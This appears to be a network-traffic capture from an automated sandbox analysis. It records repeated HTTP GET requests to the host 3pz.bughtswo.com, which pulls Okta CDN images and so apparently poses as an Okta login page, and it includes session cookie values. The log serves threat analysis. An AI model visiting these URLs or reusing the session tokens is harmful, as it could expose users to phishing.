https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnGeMwtuiseg6FuvHXI23EgklvYhJt1DtbpXmd9tZGrz78150 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxFhzp0CgTafW2l0GEvW2qmRzDYozFmnbQAb174rg3tC0nv90180 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opBd8RIsQEhweDF79MfJTmO32LcCxDbe4QgnBMPgPPghFozKdpmUpA5eLxsl9zJJ0KlUUZOyAEef196 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ghd1fCTJC2y4qjPZfLjhBbrPNhMv0H3ioowRZtB1smn00n8zWKAwWMYfyyL9TI13NS5A412210 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opuxRiSxTmEM15vBJMb9leXlu5sefNsAugLT2OPWIt7nw45140 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kl3XiVz0aPutz6bSmjR9D2P593BDt6Z4DUWuOyzYQYdRIcPOAJBMuwV98WwDp5V256170 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opwzYslPhX1AtOROVu3V2KXjF2vYFIQTFKpREUQCrAUstQdhMWnYFFGrFe6cfvB6BRzktecd232 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvoKKbZekhhECC44QCCbjXEKE2C1RQMtxPtj677UAOI8HCXxWVsm7VzpvJUgh260 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxB2I98tBROJelAq0Qq5WjZ6UMxcstFpC8Y9kgRgGII0H34126 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /opBd8RIsQEhweDF79MfJTmO32LcCxDbe4QgnBMPgPPghFozKdpmUpA5eLxsl9zJJ0KlUUZOyAEef196 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opwzYslPhX1AtOROVu3V2KXjF2vYFIQTFKpREUQCrAUstQdhMWnYFFGrFe6cfvB6BRzktecd232 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ghd1fCTJC2y4qjPZfLjhBbrPNhMv0H3ioowRZtB1smn00n8zWKAwWMYfyyL9TI13NS5A412210 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvoKKbZekhhECC44QCCbjXEKE2C1RQMtxPtj677UAOI8HCXxWVsm7VzpvJUgh260 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
